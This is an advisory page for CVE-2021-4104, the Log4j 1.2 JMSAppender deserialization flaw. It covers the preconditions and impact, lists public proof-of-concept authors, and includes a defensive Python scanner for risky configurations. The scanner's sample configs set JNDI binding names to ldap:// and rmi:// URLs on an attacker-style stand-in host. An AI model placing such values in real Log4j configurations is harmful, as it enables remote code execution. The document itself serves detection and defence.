CVE-2021-4104
Deserialization of Untrusted Data vulnerability in log4j:log4j

Deserialization of Untrusted Data Proof of concept

What is CVE-2021-4104 About?

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data, enabling remote code execution (RCE) when an attacker can write to the Log4j configuration. A malicious configuration causes the appender to issue JNDI requests to an attacker-controlled server, whose response is deserialized and leads to RCE. Exploitation depends on this specific (non-default) configuration and on write access to it.

Affected Software

  • log4j:log4j
    • >1.2.0, <=1.2.17
  • org.zenframework.z8.dependencies.commons:log4j-1.2.17
    • <=2.0

Technical Details

The JMSAppender in Apache Log4j 1.2 is susceptible to deserialization of untrusted data. The vulnerability requires an attacker with write access to the Log4j configuration file. The attacker modifies the configuration to include malicious `TopicBindingName` and `TopicConnectionFactoryBindingName` values within the JMSAppender configuration. When Log4j processes this configuration, the JMSAppender performs JNDI (Java Naming and Directory Interface) requests to resolve these binding names. If the attacker controls the remote JNDI provider (for example, an LDAP server), they can serve a malicious serialized Java object, and the vulnerable Log4j instance executes arbitrary code when it deserializes that object, much like the Log4Shell vulnerability (CVE-2021-44228). This issue only affects Log4j 1.2 when JMSAppender is explicitly configured, which is not the default.

What is the Impact of CVE-2021-4104?

Successful exploitation may allow attackers to achieve remote code execution, leading to complete system compromise, data theft, or denial of service.

What is the Exploitability of CVE-2021-4104?

Exploitation of this deserialization vulnerability is of high complexity. The critical prerequisite is that the attacker must have write access to the Log4j configuration file on the target system, which typically implies prior unauthorized access or a local privilege escalation. Authentication to the application itself may not be required, but access to the filesystem is essential. The attack can be local or remote depending on how write access to the configuration is obtained. Special conditions include the use of Log4j 1.2 AND the explicit configuration of `JMSAppender`, which is not a default setting. Furthermore, the attacker needs to operate a malicious JNDI server. Risk factors that increase likelihood include shared hosting environments where configuration files are accessible, and applications still running the end-of-life Log4j 1.2 with JMSAppender configured.
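The two preconditions described above (JMSAppender explicitly configured, and `TopicBindingName` / `TopicConnectionFactoryBindingName` pointing at a remote JNDI provider) are both visible in the configuration file, so they can be checked directly. The following scanner is an added example written for this page, not code from the advisory or from Apache Log4j; it parses both `log4j.properties` and `log4j.xml` layouts and reports every appender backed by `org.apache.log4j.net.JMSAppender` and every binding-name value that carries a remote JNDI URL scheme. The sample configurations embedded at the bottom, including the `untrusted.example` hostnames, are constructed for illustration.

```python
"""Scan Log4j 1.2 configuration for the CVE-2021-4104 preconditions.

Added example (not from the advisory). Reports:
  * ("jms_appender", <name>, <class>)   - an appender using JMSAppender
  * ("remote_jndi_ref", <name>, <k=v>)  - a TopicBindingName or
    TopicConnectionFactoryBindingName on that appender that points at a
    remote JNDI provider (ldap://, rmi://, ...)
"""
import re
import xml.etree.ElementTree as ET

JMS_APPENDER = "org.apache.log4j.net.JMSAppender"
JNDI_PARAMS = {"TopicBindingName", "TopicConnectionFactoryBindingName"}
# JNDI URL schemes that make the appender fetch an object from another host.
REMOTE_REF = re.compile(r"^(ldap|ldaps|rmi|iiop|corba)://", re.IGNORECASE)


def _findings(appenders, params):
    """appenders: name -> class; params: name -> {param name: value}."""
    out = []
    for name, cls in appenders.items():
        if cls.strip() != JMS_APPENDER:
            continue  # only JMSAppender performs the JNDI lookups at issue
        out.append(("jms_appender", name, cls.strip()))
        for pname, value in params.get(name, {}).items():
            if REMOTE_REF.match(value.strip()):
                out.append(("remote_jndi_ref", name, f"{pname}={value}"))
    return out


def scan_properties(text):
    """Scan a log4j.properties document (key=value lines)."""
    appenders, params = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")) or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        # log4j.appender.<name>=<class>
        m = re.fullmatch(r"log4j\.appender\.([^.]+)", key)
        if m:
            appenders[m.group(1)] = value
            continue
        # log4j.appender.<name>.<Property>=<value>
        m = re.fullmatch(r"log4j\.appender\.([^.]+)\.(\w+)", key)
        if m and m.group(2) in JNDI_PARAMS:
            params.setdefault(m.group(1), {})[m.group(2)] = value
    return _findings(appenders, params)


def scan_xml(text):
    """Scan a log4j.xml document (<appender name class><param name value/>)."""
    appenders, params = {}, {}
    root = ET.fromstring(text)
    for app in root.iter("appender"):
        name = app.get("name", "")
        appenders[name] = app.get("class", "")
        for p in app.findall("param"):
            if p.get("name") in JNDI_PARAMS:
                params.setdefault(name, {})[p.get("name")] = p.get("value", "")
    return _findings(appenders, params)


# Constructed sample configs: one benign appender plus one JMSAppender each.
SAMPLE_PROPERTIES = """\
# constructed sample, not a real deployment
log4j.rootLogger=INFO, file, jms
log4j.appender.file=org.apache.log4j.FileAppender
log4j.appender.file.File=app.log
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.TopicBindingName=ldap://untrusted.example:1389/obj
log4j.appender.jms.TopicConnectionFactoryBindingName=ConnectionFactory
"""

SAMPLE_XML = """\
<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="console" class="org.apache.log4j.ConsoleAppender"/>
  <appender name="queue" class="org.apache.log4j.net.JMSAppender">
    <param name="TopicConnectionFactoryBindingName" value="rmi://untrusted.example:1099/cf"/>
    <param name="TopicBindingName" value="logTopic"/>
  </appender>
  <root><level value="info"/><appender-ref ref="queue"/></root>
</log4j:configuration>
"""

if __name__ == "__main__":
    for label, result in (("properties", scan_properties(SAMPLE_PROPERTIES)),
                          ("xml", scan_xml(SAMPLE_XML))):
        for finding in result:
            print(label, *finding)
```

A `jms_appender` hit on its own already means the non-default precondition from the technical details is met and is worth removing from the configuration; a `remote_jndi_ref` hit means the binding names are already pointing off-host. Because the attack requires write access to this same file, a one-off scan is only a snapshot: pair it with integrity monitoring of the Log4j configuration so a later rewrite is caught.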

What are the Known Public Exploits?

PoC Author | Link | Commentary
cckuailong | Link | log4j 1.x RCE Poc -- CVE-2021-4104
cuijiung   | Link | PoC for CVE-2021-4104

What are the Available Fixes for CVE-2021-4104?

Available Upgrade Options

  • No fixes available


Additional Resources

What are Similar Vulnerabilities to CVE-2021-4104?

Similar Vulnerabilities: CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2022-23302, CVE-2022-23305